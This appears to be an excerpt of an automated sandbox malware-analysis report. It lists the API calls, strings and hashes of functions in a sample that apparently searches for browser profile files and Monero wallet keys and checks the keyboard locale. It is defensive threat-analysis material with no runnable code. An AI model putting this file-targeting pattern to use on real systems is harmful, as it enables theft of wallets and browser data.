                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                                • Instruction ID: 5abe8a42dcb01abe18968737260197d16a9184e07284bc86d766a53c2c46c932
                                • Opcode Fuzzy Hash: 2450c32237b4c24d5d2281e2d4b05470d8092b8e62874258cba5339ef6e90989
                                • Instruction Fuzzy Hash: 9AB174719101199BDB24FF64DC69EEE7B78BF94301F4086A9A80A97141EF306B4DCF92
                                Function 005416D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0056510C,?,?,?,005651B4,?,?,00000000,?,00000000), ref: 00541923
                                • StrCmpCA.SHLWAPI(?,0056525C), ref: 00541973
                                • StrCmpCA.SHLWAPI(?,00565304), ref: 00541989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00541D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00541DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00541E20
                                • FindClose.KERNEL32(000000FF), ref: 00541E32
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                                • Instruction ID: daf8c50fbbee7dde2974cfddf6bde6fd4dce5af52bbf2213185da11359eefa0b
                                • Opcode Fuzzy Hash: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                                • Instruction Fuzzy Hash: 6F12D0719101199BDB15EB60CCAAEEE7B78BF94301F40469AB90666091FF306F8DCF91
                                Function 0054DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00560C2E), ref: 0054DE5E
                                • StrCmpCA.SHLWAPI(?,005614C8), ref: 0054DEAE
                                • StrCmpCA.SHLWAPI(?,005614CC), ref: 0054DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0054E3E0
                                • FindClose.KERNEL32(000000FF), ref: 0054E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                                • Instruction ID: 97cef51a226f217682985b3e982d204ecac06d4f7c317bdda5e420b4ada69505
                                • Opcode Fuzzy Hash: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                                • Instruction Fuzzy Hash: D3F191718141199ADB15EB60CCA9EEE7B38BF94301F9042DBB80A62091EF346F4DCF55
                                Function 0054DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005614B0,00560C2A), ref: 0054DAEB
                                • StrCmpCA.SHLWAPI(?,005614B4), ref: 0054DB33
                                • StrCmpCA.SHLWAPI(?,005614B8), ref: 0054DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0054DDCC
                                • FindClose.KERNEL32(000000FF), ref: 0054DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                                • Instruction ID: 361af7dcf32aef6e0e1f78b9673c055ec9175f796e2a54fdafd08a1788224706
                                • Opcode Fuzzy Hash: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                                • Instruction Fuzzy Hash: 4B916572910105A7DB14FB70DC6A9ED7B7CBBC8305F408659FD0A96185FE34AB0D8BA2
                                Function 00908D9E Relevance: 12.9, Strings: 9, Instructions: 1601COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: y$m>O$!bDi$)w_$aiwv$kD<{$y/kq$zq>o$qZX
                                • API String ID: 0-2082797799
                                • Opcode ID: 0724f848f6b2c3c9a44ef2b51cd333543b30ca1dddcf7b5ee00a36a5c8c0480a
                                • Instruction ID: ffd4e93f5c63ba965ac279f17666b0313b1ca13ed1007e95e0fd8cbbc741cc18
                                • Opcode Fuzzy Hash: 0724f848f6b2c3c9a44ef2b51cd333543b30ca1dddcf7b5ee00a36a5c8c0480a
                                • Instruction Fuzzy Hash: DEB206F390C2049FE7046F2DEC8567ABBE9EB94320F1A493DEAC5C7744EA7558018687
                                Function 00557B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
                                • LocalFree.KERNEL32(00000000), ref: 00557D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                                • Instruction ID: 07f3c02ee3c202f723d2e26ee8da434637e3f1ba61d816f88894e493866ed38c
                                • Opcode Fuzzy Hash: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                                • Instruction Fuzzy Hash: 7041317194011DABDB24DB94DCA9BEDBB74FF48701F2042DAE40962191DB342F89CF61
                                Function 009072A8 Relevance: 10.4, Strings: 7, Instructions: 1628COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "i$;j{$<o{$F5;u$SK<}$oxg$xv
                                • API String ID: 0-2361976449
                                • Opcode ID: dc062d5ceb47237897a344122bd9a396036627e54df5f372376db778bc62fc43
                                • Instruction ID: 1d8afbf221882ba8d9046d6fce33fb83b454ce63205ec85d7bec961bce23b795
                                • Opcode Fuzzy Hash: dc062d5ceb47237897a344122bd9a396036627e54df5f372376db778bc62fc43
                                • Instruction Fuzzy Hash: E2B2F6F3A0C2049FE3046E29EC8567AFBE9EF94320F16493DEAC5C3744EA3558058697
                                Function 0054E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00560D73), ref: 0054E4A2
                                • StrCmpCA.SHLWAPI(?,005614F8), ref: 0054E4F2
                                • StrCmpCA.SHLWAPI(?,005614FC), ref: 0054E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0054EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                                • Instruction ID: 92de1f8ba9523055a40bdc1c4033d087b780ebf467ebe43ece16487fd614e6fc
                                • Opcode Fuzzy Hash: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                                • Instruction Fuzzy Hash: 8C1212719101199ADB14FB70DCAAEED7B38BF94301F40469AB90A56091FE346F4DCF92
                                Function 00900816 Relevance: 9.1, Strings: 6, Instructions: 1629COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &aw$&g|$IX]}$P)?$[AK_$K;y
                                • API String ID: 0-4203538712
                                • Opcode ID: e380660c4f6cb18a97091c2b5489c7e8441b3aa9e5e2ed1fe239e3d895a4f2d2
                                • Instruction ID: e6892250e181262bac95f2b982eb899a2f21dfabe859edb1b4202ff866b95566
                                • Opcode Fuzzy Hash: e380660c4f6cb18a97091c2b5489c7e8441b3aa9e5e2ed1fe239e3d895a4f2d2
                                • Instruction Fuzzy Hash: 05B225F360C2049FE3046E2DEC8567AFBE9EF94720F1A493EE6C4C7744EA3558058696
                                Function 00549AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                                • LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: NT
                                • API String ID: 4291131564-3872220154
                                • Opcode ID: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                                • Instruction ID: fa5fa80d131fc05bd5f03fd5fac8984afd61c662d84234e1d302f94a3c0d89c4
                                • Opcode Fuzzy Hash: 292f08fdf4b4d8805c376d937098525a36b7c593564d086cca27324208f1f5a5
                                • Instruction Fuzzy Hash: B011AFB4640208BFEB10CF64DC95FAA77B5FB89704F208059FA159B390C7B6A901DBA4
                                Function 009022EA Relevance: 7.9, Strings: 5, Instructions: 1623COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
